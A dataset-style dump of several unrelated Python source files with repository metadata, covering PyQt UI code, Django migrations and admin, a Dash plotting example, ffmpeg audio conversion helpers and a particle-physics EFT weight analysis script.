# Fetch the base_class and form class based on their type
# in the xml from designer
form_class = frame['Ui_%s'%form_class]
base_class = eval('%s'%widget_class)
return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Item_Layout.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item_Layout(form_class,base_class):
def __init__(self):
super(Cam_Item_Layout,self).__init__()
self.setupUi(self)
self.Item_Add_BTN.clicked.connect(self.Item_Add_Fn)
self.Item_Clear_BTN.clicked.connect(self.Item_Clear_Fn)
def Item_Add_Fn(self):
Cam_Item(self)
def Item_Clear_Fn(self):
for i,child in enumerate(self.Item_Layout.children()):
if i != 0:
child.deleteLater()
UI_PATH = os.path.join(DIR,"ui","Cam_Item.ui")
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item(form_class,base_class):
def __init__(self,parent):
super(Cam_Item,self).__init__()
self.setupUi(self)
self.Cam_Del_BTN.clicked.connect(self.Cam_Del_BTN_Fn)
TotalCount = len(parent.Item_Layout.children())
parent.Item_Layout.layout().insertWidget(TotalCount-1,self)
self.Cam_LE.setText("Cam_Item_%s" % TotalCount)
self.Cam_Num_Label.setText(u"镜头%s" % TotalCount)
self.setObjectName("Cam_Item_%s" % TotalCount)
self.num = TotalCount
def Cam_Del_BTN_Fn(self):
self.deleteLater()
# # TotalCount = len(self.parent().children())
ChildrenList = self.parent().children()
# print ChildrenList
# for i in range(self.num,len(ChildrenList)):
# if i+1 == len(ChildrenList):
# del(ChildrenList[i])
# break
# ChildrenList[i] = ChildrenList[i+1]
# print ChildrenList
# count = 0
# for child in ChildrenList:
# if count != 0:
# child.Cam_Num_Label.setText(u"%s" % count)
# child.setObjectName("Cam_Item_%s" % count)
# print count
# count += 1
# for i,child in enumerate(ChildrenList):
# if i != 0:
# print u"%s" % i
# child.Cam_Num_Label.setText(u"%s" % i)
# child.setObjectName("Cam_Item_%s" % i)
index = 999999
for i,child in enumerate(ChildrenList):
if i != 0:
child.Cam_Num_Label.setText(u"镜头%s" % i)
child.setObjectName("Cam_Item_%s" % i)
if i < self.num:
child.Cam_Num_Label.setText(u"镜头%s" % (i-1))
child.setObjectName("Cam_Item_%s" % i-1)
| [
"2595715768@qq.com"
] | 2595715768@qq.com |
b4452af8858336844e7ecd9620be68d208465a26 | f33316e25f0a867d4bf3dc054d8ac133520e322d | /orders/migrations/0001_initial.py | 6ebfdeb7598fbf46739883d752b97b6340ebbf50 | [] | no_license | blingstand/lengow_test | ac2338e44fb92a4f4b6d8ac1b878d3906332806b | 1939048587b6537d9b7132f932f6d182aa5dd09e | refs/heads/master | 2020-06-23T23:25:53.030690 | 2019-07-25T07:49:18 | 2019-07-25T07:49:18 | 198,783,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | # Generated by Django 2.2.3 on 2019-07-25 07:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Marketplace',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Status',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('marketplace', models.CharField(max_length=100)),
('lengow', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_hour', models.DateTimeField(verbose_name='Date de la commande')),
('amount', models.CharField(max_length=100)),
('marketplace_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='orders.Marketplace')),
('order_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='orders.Status')),
],
options={
'ordering': ['date_hour'],
},
),
]
| [
"blingstand@hotmail.fr"
] | blingstand@hotmail.fr |
eb10bfb466bab9a81ea4d387369ee01657e46451 | 1850dac6af5c111f0b45542dbdd15abbfc91471f | /utils/security.py | 17834c0c02246d6bba73f2bde5ee2c05d6a0c70e | [] | no_license | leonbaraza/User-Management | 7551586c188c20a18f0db36048c22ce58da48b47 | 8f9658fe41f123d8f009e81e5be96dceb4f49d23 | refs/heads/master | 2023-03-17T10:20:42.149434 | 2020-04-18T04:44:04 | 2020-04-18T04:44:04 | 256,582,339 | 0 | 0 | null | 2021-03-20T03:34:41 | 2020-04-17T18:39:14 | HTML | UTF-8 | Python | false | false | 125 | py | from itsdangerous import URLSafeTimedSerializer
from app import app
ts = URLSafeTimedSerializer(app.config['SECRET_KEY'])
| [
"leonbaraza@gmail.com"
] | leonbaraza@gmail.com |
cf24680305aff81ff86ab5ebb28a06a585343af1 | cbfddfdf5c7fa8354162efe50b41f84e55aff118 | /venv/lib/python3.7/site-packages/apscheduler/executors/debug.py | ac739aebcef52bb0b824e66c1fcfc7693b4fab6a | [
"MIT",
"Apache-2.0"
] | permissive | tclerico/SAAC | 8d2245221dd135aea67c5e079ac7eaf542b25e2f | 2f52007ae8043096662e76da828a84e87f71091e | refs/heads/master | 2022-12-09T21:56:33.430404 | 2019-02-20T14:23:51 | 2019-02-20T14:23:51 | 153,152,229 | 3 | 0 | MIT | 2022-09-16T17:52:47 | 2018-10-15T17:13:29 | Python | UTF-8 | Python | false | false | 573 | py | import sys
from apscheduler.executors.base import BaseExecutor, run_job
class DebugExecutor(BaseExecutor):
"""
A special executor that executes the target callable directly instead of deferring it to a
thread or process.
Plugin alias: ``debug``
"""
def _do_submit_job(self, job, run_times):
try:
events = run_job(job, job._jobstore_alias, run_times, self._logger.name)
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
| [
"timclerico@gmail.com"
] | timclerico@gmail.com |
7f5868db1af43cb9124e4dfb9aa8350807e5364c | 774adf830542c6dfe461d652120631f0cbd102a0 | /auctions/admin.py | 57b0a9d64787dcecbb5a6214aacc8353b42104d2 | [] | no_license | Idris01/learn | 1ebf404af26bb1cea23f51175d9e49bb31cb720c | b8481a075df65acd01848765116478c08dff8cc5 | refs/heads/master | 2023-01-05T06:25:18.851366 | 2020-11-05T17:14:35 | 2020-11-05T17:14:35 | 310,609,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | from django.contrib import admin
from django.contrib.admin import ModelAdmin
from . models import User, Listing, Bid,Comment, Winners
# Register your models here.
@admin.register(User)
class UserAdmin(ModelAdmin):
pass
@admin.register(Listing)
class ListingAdmin(ModelAdmin):
pass
@admin.register(Bid)
class BidAdmin(ModelAdmin):
pass
@admin.register(Comment)
class CommentAdmin(ModelAdmin):
pass
@admin.register(Winners)
class WinnersAdmin(ModelAdmin):
pass | [
"idrys01@gmail.com"
] | idrys01@gmail.com |
e0dc3ae013b13e56a10d616089abddf43297f87c | 31eec231283a5ff66241a3fa5370f60f04a58200 | /pyhighlighter.py | 9e22bd927823ae00484b1195753da7999444762a | [] | no_license | zhhrozhh/pyzzle | 93cf53e56b369aba5ca63324c2ea4ba2b1ff0cef | a96dd9690ef11e88d5accca5bfa8ccf41500d036 | refs/heads/master | 2021-01-13T11:31:58.963307 | 2017-01-02T06:46:23 | 2017-01-02T06:46:23 | 77,775,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,977 | py | #http://stackoverflow.com/questions/26679515/how-to-update-qsyntaxhighlighter-color-coding-when-user-changes-text
import sys
from PyQt4.QtCore import QRegExp
from PyQt4.QtGui import QColor,QTextCharFormat,QFont,QSyntaxHighlighter
def format(color, style=''):
_color = QColor()
_color.setNamedColor(color)
_format = QTextCharFormat()
_format.setForeground(_color)
if 'bold' in style:
_format.setFontWeight(QFont.Bold)
if 'italic' in style:
_format.setFontItalic(True)
return _format
STYLES = {
'keyword': format('blue'),
'operator': format('darkred'),
'brace': format('cyan','bold'),
'defclass': format('green', 'bold'),
'string': format('darkGreen'),
'string2': format('darkMagenta'),
'comment': format('Grey', 'italic'),
'self': format('black', 'italic'),
'numbers': format('darkMagenta'),
}
class PythonHighlighter (QSyntaxHighlighter):
keywords = [
"open", "close", "elif", "if","for","while","break","continue"
"from", "import","as","range"
"join", "lambda",
"sum", "max", "min","return",
"def","class","range","print","eval","exec","global"
]
operators = [
"and", "in", "or","not","is"
"\\^", "=", ">=", ">",
"<=", "<",
]
braces = [
'\{', '\}', '\(', '\)', '\[', '\]',
]
def __init__(self, document):
QSyntaxHighlighter.__init__(self, document)
rules = []
rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
for w in PythonHighlighter.keywords]
rules += [(r'\b%s\b' % o, 0, STYLES['operator'])
for o in PythonHighlighter.operators]
rules += [(r'%s' % b, 0, STYLES['brace'])
for b in PythonHighlighter.braces]
rules += [
(r'\bself\b', 0, STYLES['self']),
(r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
(r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
(r'"{3}[\s\S]*?"{3}',0,STYLES['string']),
(r"'{3}[\s\S]*?'{3}",0,STYLES['string']),
(r'\bdef\b\s*(\w+)', 1, STYLES['defclass']),
(r'\bclass\b\s*(\w+)', 1, STYLES['defclass']),
(r'#[^\n]*', 0, STYLES['comment']),
(r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b', 0, STYLES['numbers']),
]
self.rules = [(QRegExp(pat), index, fmt)
for (pat, index, fmt) in rules]
def highlightBlock(self, text):
for expression, nth, format in self.rules:
index = expression.indexIn(text, 0)
while index >= 0:
index = expression.pos(nth)
length = len(expression.cap(nth))#.length()
self.setFormat(index, length, format)
index = expression.indexIn(text, index + length)
self.setCurrentBlockState(0) | [
"zhangh40@msu.edu"
] | zhangh40@msu.edu |
8a66309cef71bfec55cfda5a309e8111dc4d5640 | a25e73dad4794f13fa8c77567d8b628875d9e252 | /ex1.py | ac3151b24d5332824f9c179fd6e1a8ff437ed017 | [
"MIT"
] | permissive | alhaol/dash-svm | e77dc1aab6fefb26fae5a7d172eb4720bba562fb | 0b4ce502be6b5d026049dfe4f9e41cbc65815e42 | refs/heads/master | 2020-04-26T05:29:28.777021 | 2019-05-10T18:48:09 | 2019-05-10T18:48:09 | 173,335,823 | 0 | 0 | null | 2019-03-01T16:40:19 | 2019-03-01T16:40:19 | null | UTF-8 | Python | false | false | 1,453 | py |
import dash
import dash_core_components as dcc
import dash_html_components as html
app = dash.Dash()
Fig1= dcc.Graph(
id='fig1',
figure={
'data': [
{'x': [1, 2, 3, 4, 5], 'y': [9, 6, 2, 1, 5], 'type': 'line', 'name': 'Boats'},
{'x': [1, 2, 3, 4, 5], 'y': [8, 7, 2, 7, 3], 'type': 'bar', 'name': 'Cars'},
],
'layout': {
'title': 'Basic Dash Example'
}
}
)
Fig2= dcc.Graph(
id='fig2',
figure={
'data': [
{'x': [1, 2, 3, 4, 5], 'y': [9, 6, 2, 1, 5], 'type': 'line', 'name': 'Boats'},
{'x': [1, 2, 3, 4, 5], 'y': [8, 7, 0, 7, 0], 'type': 'bar', 'name': 'Cars'},
],
'layout': {
'title': 'Basic Dash Example'
}
}
)
Fig3= dcc.Graph(
id='fig3',
figure={
'data': [
{'x': [1, 2, 3, 4, 5], 'y': [9, 6, 2, 1, 5], 'type': 'line', 'name': 'Boats'},
{'x': [1, 2, 3, 4, 5], 'y': [8, 7, 0, 7, 0], 'type': 'bar', 'name': 'Cars'},
],
'layout': {
'title': 'Basic Dash Example'
}
}
)
app.layout = html.Div(children=[
html.H1(children='Dash Tutorials'),
Fig1,
Fig2,
Fig3
])
# Running the server
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port='7777') | [
"ibrahim.abualhaol@larus.com"
] | ibrahim.abualhaol@larus.com |
fda997527f91121c4f1bffd1b3f2b0ddcc3dc4fa | 1d7eec692553afc411ec1e7325634f71a2aed291 | /backend/curriculum_tracking/migrations/0007_auto_20200710_1319.py | 9c49a0b43cc247004d1e90d0e0992ef9482c6d27 | [] | no_license | Andy-Nkumane/Tilde | a41a2a65b3901b92263ae94d527de403f59a5caf | 80de97edaf99f4831ca8cb989b93e3be5e09fdd6 | refs/heads/develop | 2023-05-09T10:02:41.240517 | 2021-05-28T09:20:51 | 2021-05-28T09:20:51 | 299,501,586 | 0 | 0 | null | 2020-10-25T22:37:30 | 2020-09-29T04:10:48 | Python | UTF-8 | Python | false | false | 1,043 | py | # Generated by Django 2.1.5 on 2020-07-10 13:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('curriculum_tracking', '0006_auto_20200701_0539'),
]
operations = [
migrations.AddField(
model_name='recruitproject',
name='code_review_competent_since_last_review_request',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='recruitproject',
name='code_review_excellent_since_last_review_request',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='recruitproject',
name='code_review_ny_competent_since_last_review_request',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='recruitproject',
name='code_review_red_flag_since_last_review_request',
field=models.IntegerField(default=0),
),
]
| [
"sheena.oconnell@gmail.com"
] | sheena.oconnell@gmail.com |
966665af55225f40fdd4da19c28dd883a43f62ff | 3c8bc614c9f09db5efce54af3cbcaf78e0f48b54 | /0x0B-python-input_output/4-append_write.py | e5256329fd3346953966d0bb9bdd0fec8b45629c | [] | no_license | davidknoppers/holbertonschool-higher_level_programming | 7848d301c4bf5c1fa285314392adfb577d6d082f | beaf6e5ece426c2086f34763e50c3ce0f56923ac | refs/heads/master | 2021-04-29T10:10:27.071278 | 2017-05-03T02:46:44 | 2017-05-03T02:46:44 | 77,847,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | #!/usr/bin/python3
"""
One function in this module
append_write opens a file and appends some text to it
"""
def append_write(filename="", text=""):
"""
open file
put some text at the end of it
close that file
"""
with open(filename, mode='a', encoding="utf-8") as myFile:
chars_written = myFile.write(text)
return chars_written
| [
"david.knoppers@holbertonschool.com"
] | david.knoppers@holbertonschool.com |
b3d0865a0cf9592cde62d1e601c04c26b3042079 | 29d64db8494161a0c9cb223992d44f7bd201b104 | /utils.py | 2b1012d2fe560f8779a17dad36372d6cbc84d015 | [] | no_license | marakhmusic/Environment-Detection-using-audio | 2b8b33a651a273ed69fb798a549be2327a010755 | b44026f1415f73d7dd17e8385fc99e5afe03fd24 | refs/heads/main | 2023-01-03T05:44:18.708724 | 2020-10-15T13:36:19 | 2020-10-15T13:36:19 | 304,333,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,642 | py |
from subprocess import PIPE, Popen, run
def convert_to_PCM(file, out_Fs=44100):
cmd = ['ffmpeg', '-i', '-', '-f', 's16le', '-ar', str(out_Fs), 'pipe:1' ]
process = Popen(cmd, stdin=file, stdout=PIPE, stderr=PIPE)
output, error = process.communicate()
#print(output)
#print(error)
return output
def save_as_wav(pcm_data, out_file='out.wav', out_Fs= 44100, output=False):
print(f'saving pcm data as {out_file}')
args = ['ffmpeg',
'-y',
'-f',
's16le',
'-ar',
str(out_Fs),
'-i',
'-',
out_file
]
process = run(args, input=pcm_data, stderr=PIPE, stdout=PIPE)
if output:
print(f'process return code: {process.returncode}')
print(process.stdout)
print(process.stderr)
print(f'recording has been saved by the name of {out_file}!')
#print('output', output)
def save_file_as_wav(file, out_name, output=True):
print('saving file as ', out_name)
args = ['ffmpeg',
'-y',
'-i', '-',
'-ar', '44100',
out_name]
#process = Popen(args, stdin=file, stdout=PIPE, stderr=PIPE)
process = run(args, stdin=file, stdout=PIPE, stderr=PIPE)
if output:
print(f'process return code: {process.returncode}')
print(process.stdout)
print(process.stderr)
print(f'recording has been saved by the name of {out_name}!')
return output
def s(pcm_data, out_file='out.wav', output=True):
print(f'saving {out_file} file')
cmd = ['ffmpeg',
'-y', # override if the file already exists
'-f', 's16le', # input format s16le
"-acodec", "pcm_s16le", # raw pcm data s16 little endian input
'-i', '-', # pipe input
'-ac', '1', # mono
out_file] # out file name
if output:
print(f'cmd: {cmd}')
process = run(cmd, input=pcm_data.tobytes(), stdout=PIPE, stderr=PIPE)
if output:
print(f'process return code: {process.returncode}')
print(process.stdout)
def get_PCM(file, output=False):
"""Get the PCM data in the given file"""
print('geting PCM data')
args = [ 'ffmpeg',
'-i',
'-',
'-f',
's16le',
'-ar',
'44100',
'-']
process = run(args, input=file, stdout=PIPE, stderr=PIPE)
if output:
print(f'process return code: {process.returncode}')
print(process.stdout)
return process.stdout
| [
"noreply@github.com"
] | marakhmusic.noreply@github.com |
2c8a949f713cf95a9d66b2fcd2acc3e0cc636397 | 20374a973fa916c705e3de1bfcffcab0c4e8fa29 | /df_ana.py | 9efa63038da37542c6a111884f6c3241ca1b9400 | [] | no_license | Bryancaraway/EFT_Analyzer | 7a4905daaf6b3f8b91dea0bc4cd235349d9ea87a | 97fd053e9b2872df54f50130408ee9fffaafd135 | refs/heads/master | 2023-06-27T22:23:12.878027 | 2020-08-16T21:36:58 | 2020-08-16T21:36:58 | 288,027,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,285 | py | import sys
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
def main():
aux_df = pd.read_pickle('aux_EFT.pkl')
df = pd.read_pickle('eventInfo_EFT.pkl')
bins = np.arange(0,1050,50)
h_pt = np.clip(df['H_pt'].to_numpy(), bins[0], bins[-1])
h_pt = np.repeat(h_pt[:,np.newaxis],3,axis=1)
#print(df)
#print(aux_df)
#print(df)
sm = aux_df.index.values[-1]
def plotWCvsWgt(wc_str):
f_x = aux_df.sort_values(by=wc_str)[wc_str]
#
row1 = df.filter(regex=r'EFTrwgt\d+').iloc[0]
x = row1/row1['EFTrwgt183']
#
fx_df = pd.concat([f_x,x],axis='columns')
plt.scatter(y=fx_df.iloc[:,1], x=fx_df.loc[:,wc_str])
plt.axhline(1, color='r')
plt.ylim(0)
plt.grid(True)
plt.title(wc_str)
plt.xlabel(f'WC {wc_str} ')
plt.ylabel('EFT/SM (weight)' )
plt.show()
#
#plotWCvsWgt('ctZ')
#
def giveHiLoWC(wc_str):
hi = aux_df.sort_values(by=wc_str , ascending=False).index.values[0]
lo = aux_df.sort_values(by=wc_str , ascending=True) .index.values[0]
return hi, lo
def plot_EFT_scale(wc_str):
hi, lo = giveHiLoWC(wc_str)
#
w_hi, w_lo, w_sm = df[hi], df[lo], df[sm]
plt.hist(h_pt,
histtype='step',
bins=bins,
weights=[w_hi,w_lo,w_sm],
label=[(lambda x : '{0} = {1:5.3f}'.format(wc_str,aux_df.loc[x,wc_str]))(y) for y in [hi,lo,sm]])#str(aux_df.loc[hi,wc_str]),str(aux_df.loc[lo,wc_str]),str(aux_df.loc[sm,wc_str])])
plt.title(wc_str)
plt.xlabel('GEN H pt (GeV)')
plt.grid(True)
plt.xlim(bins[0],bins[-1])
plt.legend()
plt.savefig('pdf/{}.pdf'.format(wc_str))
#plt.show()
plt.clf()
#
eft_wc = ( # all 16 considered WC
'ctW', 'ctp', 'cpQM', 'ctli', 'cQei', 'ctZ', 'cQlMi', 'cQl3i', 'ctG', 'ctlTi', 'cbW', 'cpQ3', 'ctei', 'cpt', 'ctlSi', 'cptb'
)
eft_hb_wc = ( # two heavy + boson Wilson Coefficients
'ctp', 'cpQM', 'cpQ3', 'cpt', 'cptb', 'ctW', 'ctZ', 'cbW', 'ctG'
)
eft_2l_wc = ( # two heavy + two lepton Wilson Coefficients
'cQl3i', 'ctli', 'cQei', 'cQlMi', 'ctlTi', 'ctei', 'ctlSi'
)
for wc in eft_hb_wc:
plot_EFT_scale(wc)
def computeBeta():
# taken from Jon's code
# Build the experiment matrix
x =[np.ones(184)]
count = 0
for i in range(16):
for j in range(i+1):
count+=1
print(count, i , j)
x.append(aux_df.iloc[:,i].values * aux_df.iloc[:,j].values)
count+=1
print(count,i)
#if (i == 0 ): print( count, aux_df.iloc[:,i])
x.append(aux_df.iloc[:,i].values)
x = np.matrix(x).T
# Build the result matrix y
y = np.asmatrix(df.iloc[:,:-3].to_numpy()).T
# Compute beta matrix
beta = ((x.T * x).I * x.T * y).A
return beta, x, y
beta, x, y = computeBeta()
print(list(map(lambda _: _.shape, [beta, x, y])))
print(aux_df.columns[0])
w_c0 = lambda c : beta[1]*c*c + beta[2]*c + beta[0]
plt.hist(h_pt,
histtype='step',
bins=bins,
weights=[w_c0(1)/np.sum(w_c0(1)),w_c0(-1)/np.sum(w_c0(-1)),beta[0]/np.sum(beta[0])],
density=True,
label=[f'{aux_df.columns.values[0]} = 1',f'{aux_df.columns.values[0]} = -1', 'SM'])
plt.yscale('log')
plt.xlim(0)
plt.legend()
plt.show()
def get_root_hist(roofile):
from ROOT import TFile, TH1F
f = TFile(roofile,'READ')
hist_content = []
for i in f.GetListOfKeys():
hist = i.ReadObj()
hist_content.append([hist.GetBinContent(j+1) for j in range(hist.GetNbinsX()+1)])
hist_content = np.array(hist_content)
hist_content = np.sum(hist_content, axis=0)
hist_binned = [np.sum(hist_content[0:4]),np.sum(hist_content[4:6]), np.sum(hist_content[6:8]), np.sum(hist_content[8:])]
return hist_binned/np.sum(hist_binned)
class EFT_DC_Prep:
gen_bins = {
'pt': np.arange(0,1050,50),
'400inc': [0,200,300,400,500],
'300inc': [0,200,300,400]
} # this will be clipped, i.e 400 - inf
gen_bins_labels = {
'400inc': ['tt_HZ_bin1','tt_HZ_bin2','tt_HZ_bin3','tt_HZ_bin4'],
'300inc': ['tt_HZ_bin1','tt_HZ_bin2','tt_HZ_bin3']
}
# heavy flavour + boson: 'ctp', 'cpQM', 'cpQ3', 'cpt', 'cptb', 'ctW', 'ctZ', 'cbW', 'ctG'
# 2 sigma interval (sm) for AN2019_011
an2019_11 = {
'ctp' : [-14.12,-1.48,32.30,44.48],
'cpQM': [-3.45,3.33],
'cpQ3': [-7.21,2.25],
'cpt' : [-20.91,-14.10,-6.52,4.24],
'cptb': [-9.87, 9.67],
'ctW' : [-2.15,-0.29,0.21,1.96],
'ctZ' : [-2.14,2.19],
'cbW' : [-4.12,4.09],
'ctG' : [-1.26,-0.69,0.08,0.79]
}
def __init__(self, part, aux_file, wgt_file, eft_params):
self.part = part
self.aux_df = pd.read_pickle(aux_file)
self.wgt_df = pd.read_pickle(wgt_file).loc[:,self.aux_df.index.values]
self.gen_df = pd.read_pickle(wgt_file).filter(regex=r'[HZ]_\w+') # will need to generalize
self.eft = eft_params
self.beta = self.compute_beta()
def compute_beta(self):
# taken from Jon's code
# Build the experiment matrix
x =[np.ones(len(self.aux_df.index.values))]
beta_cols = ['SM']
for i in range(len(self.aux_df.columns.values)):
for j in range(i+1):
x.append(self.aux_df.iloc[:,i].values * self.aux_df.iloc[:,j].values)
beta_cols.append(f'{self.aux_df.columns.values[i]}_{self.aux_df.columns.values[j]}')
x.append(self.aux_df.iloc[:,i].values)
beta_cols.append(f'{self.aux_df.columns.values[i]}')
x = np.matrix(x).T
# Build the result matrix y
y = np.asmatrix(self.wgt_df.to_numpy()).T
# Compute beta matrix
beta = ((x.T * x).I * x.T * y).A
return pd.DataFrame(data = beta.T, columns=beta_cols)
def plot_all_eft_scale(self, k_type='pt', opt='all', tag=None):
kinem = np.clip(self.gen_df[self.part+'_'+k_type], self.gen_bins[k_type][0], self.gen_bins[k_type][-1])
#h_SM, bins = np.histogram(kinem, bins=self.gen_bins[k_type], weights=self.beta['SM'])
#for i, row in
eft_calc_opt = {'all':self.calc_eft_weight,
'q': (lambda x,y,z: self.calc_eft_weight_Q(x,y,z) + self.beta['SM']),
'p': (lambda x,y,z: self.calc_eft_weight_P(x,y,z) + self.beta['SM'])}
w_SM = self.beta['SM']
for param in self.eft:
#w_eft = [eft_calc_opt[opt]({param:i}, kinem, k_type) for i in [-1,1]]
w_eft = [eft_calc_opt[opt]({param:i}, kinem, k_type) for i in self.an2019_11[param]]
fig, (ax,ax2) = plt.subplots(2,1, sharex=True, gridspec_kw={'height_ratios':[3,1]})
fig.subplots_adjust(hspace=0.0)
n, bins,_ = ax.hist([kinem for i in range(len(w_eft)+1)],
#[kinem,kinem,kinem],
bins=self.gen_bins[k_type],
histtype='step',
weights = w_eft+[w_SM],#[w_eft[0],w_eft[1],w_SM],
#label=np.append([param +'='+str(i) for i in [-1,1]],'SM'))
label=np.append([param +'='+str(i) for i in self.an2019_11[param]],'SM'))
ax.set_yscale('log')
ax.set_ylabel('Events')
bin_c = (self.gen_bins[k_type][1:]+self.gen_bins[k_type][:-1])/2
bin_w = (self.gen_bins[k_type][1:]-self.gen_bins[k_type][:-1])
for i in range(len(n)-1):
ax2.errorbar(x=bin_c, xerr=bin_w/2,
y=n[i]/n[-1],
fmt='.')
#ax2.errorbar(x=bin_c, xerr=bin_w/2,
# y=n[1]/n[2],
# fmt='.')
ax2.axhline(1, color='k', linewidth='1', linestyle='--', dashes=(4,8), snap=True)
ax2.set_ylim(.5,1.5)
ax2.set_ylabel('EFT/SM')
plt.xlim(self.gen_bins[k_type][0],self.gen_bins[k_type][-1])
plt.xlabel(f'GEN {self.part} pt [GeV]')
ax.legend()
plt.show()
#plt.close(fig)
#
import matplotlib.backends.backend_pdf as matpdf
pdf = matpdf.PdfPages(f"pdf/{self.part}_WC_calc{opt}{'' if tag is None else '_'+tag}.pdf")
for fig_ in range(1, plt.gcf().number+1):
pdf.savefig( fig_ )
pdf.close()
plt.close('all')
def plot_xsec_eft_scale(self, tag=None):
w_SM = self.beta['SM']
n_bins = 50
for param in self.eft:
low_edge, hi_edge, step = self.an2019_11[param][0], self.an2019_11[param][-1], (self.an2019_11[param][-1]-self.an2019_11[param][0])/n_bins
x = np.arange(low_edge, hi_edge+step,step)
y = [np.sum(self.calc_eft_weight({param: i}))/np.sum(w_SM) for i in x]
plt.figure()
plt.plot(x, y, label=f'{param}')
plt.xlabel(f'{param} value')
plt.ylabel('xsec ratio (EFT/SM)')
plt.ylim(0.5, 1.5)
plt.title(f'xsec ratio vs WC {param}')
#plt.legend()
#plt.show()
#plt.clf()
import matplotlib.backends.backend_pdf as matpdf
pdf = matpdf.PdfPages(f"pdf/{self.part}_WC_xsec_ratio{'' if tag is None else '_'+tag}.pdf")
for fig_ in range(1, plt.gcf().number+1):
pdf.savefig( fig_ )
pdf.close()
plt.close('all')
def plot_eft_scale(self, eft_dict, k_type='pt'):
kinem = np.clip(self.gen_df[self.part+'_'+k_type], self.gen_bins[k_type][0], self.gen_bins[k_type][-1])
#h_SM, bins = np.histogram(kinem, bins=self.gen_bins[k_type], weights=self.beta['SM'])
#for i, row in
w_SM = self.beta['SM']
w_eft = self.calc_eft_weight(eft_dict, kinem, k_type)
#print(w_SM,w_eft)
print(w_eft)
plt.hist([kinem,kinem],
bins=self.gen_bins[k_type],
histtype='step',
weights = [w_eft,w_SM],
label=np.append([k +'='+str(eft_dict[k]) for k in eft_dict],'SM'))
#plt.yscale('log')
plt.xlim(self.gen_bins[k_type][0],self.gen_bins[k_type][-1])
plt.legend()
plt.show()
def calc_eft_weight_P(self, eft_dict, kinem=None, k_type=None):
p = np.sum([self.beta[k1+'_'+k2]*v1*v2\
for k1,v1 in eft_dict.items() for k2,v2 in eft_dict.items()], axis=0)
return p
def calc_eft_weight_Q(self, eft_dict, kinem=None, k_type=None):
q = np.sum([self.beta[k]*v\
for k,v in eft_dict.items()], axis=0)
return q
def calc_eft_weight(self, eft_dict, kinem=None, k_type=None):
p = self.calc_eft_weight_P(eft_dict,kinem,k_type)
q = self.calc_eft_weight_Q(eft_dict,kinem,k_type)
r = self.beta['SM']
#print(p,q,r)
return p + q + r
def create_dc_Df(self, inc='400inc'):
pt_dist = np.clip(self.gen_df[self.part+'_pt'], self.gen_bins['400inc'][0],self.gen_bins['400inc'][-1])
pqr_df = self.beta.groupby(
pd.cut(pt_dist,self.gen_bins['400inc'], labels=list(map((lambda x : x.replace('_HZ_', self.part)), self.gen_bins_labels[inc])))
).sum()
#
pqr_list = ['SM'] + list(self.eft) + \
list(set([self.eft[i]+'_'+self.eft[j] for i in range(len(self.eft)) for j in range(i,len(self.eft))] +\
[self.eft[j]+'_'+self.eft[i] for i in range(len(self.eft)) for j in range(i,len(self.eft))]))
pqr_df = pqr_df.filter(items=pqr_list, axis='columns')
pqr_df = pqr_df.divide(pqr_df['SM'], axis='rows')
#
wc_min_max = pd.DataFrame({key:[self.aux_df[key].min(), self.aux_df[key].max()] for key in self.aux_df.filter(items=self.eft).columns}, index=pd.CategoricalIndex(['min','max']))
#
pqr_df.to_pickle('pqr_df_'+self.part+'.pkl')
wc_min_max.to_pickle('wc_minmax_df_'+self.part+'.pkl')
def getMCshape(self):
pt_dist = np.clip(self.gen_df[self.part+'_pt'], self.gen_bins['400inc'][0],self.gen_bins['400inc'][-1])
h, bins = np.histogram(pt_dist, bins=self.gen_bins['400inc'], weights=self.wgt_df['EFTrwgt183'])
h_unw, _ = np.histogram(pt_dist, bins=self.gen_bins['400inc'])
return h,bins, h_unw
def __getitem__(self,key):
return getattr(self,key)
def plot4Andrew(mc_hist,nd_hist,nd_bins,raw_c):
fig, (ax0,ax1) = plt.subplots(nrows=2)
nd_err = (np.sqrt(raw_c)/raw_c)*nd_hist/np.sum(nd_hist)
nd_hist = nd_hist/np.sum(nd_hist)
bins = [100,250,350,450]
bin_w = [200,100,100,100]
#
ax0.bar(bins,mc_hist, width=bin_w, label='MC_central', fill=False, edgecolor='tab:red')
